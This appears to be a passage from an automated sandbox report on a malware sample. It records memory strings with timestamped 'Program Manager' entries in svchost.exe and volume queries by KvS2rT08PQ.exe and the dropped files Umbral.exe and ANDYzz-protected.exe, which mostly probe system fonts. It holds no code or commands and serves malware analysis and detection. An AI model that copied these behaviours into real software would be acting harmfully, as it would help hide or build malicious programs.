              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 20:45:03 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 05:20:34 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 05:49:50 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 05:12:17 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/24 | 00:03:31 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 09:29:34 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 04:04:13 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 04:05:43 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 08:05:48 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 03:25:50 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 08:31:14 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 07:10:52 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 07:13:51 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 07:23:10 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 04:27:06 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/21 | 14:35:18 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 21:14:34 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 10:18:53 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 21:54:37 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 22:22:38 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 04:10:09 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 23:07:51 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 23:17:10 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 09:54:46 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 22:39:50 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 23:35:35 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 23:38:34 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 05:46:51 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 04:21:50 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 23:00:13 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 23:54:41 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 23:51:42 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 05:45:21 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 08:38:52 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 22:38:20 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 09:46:56 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 07:19:22 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 03:53:34 - Program Manager
              Source: svchost.exe, 00000002.00000002.4100093724.0000000003BD7000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4100093724.000000000400C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/21 | 13:23:12 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 06:11:16 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 03:52:04 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 05:03:12 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 04:39:25 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 21:57:36 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 07:32:15 - Program Manager
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeQueries volume information: C:\Users\user\Desktop\KvS2rT08PQ.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Umbral.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
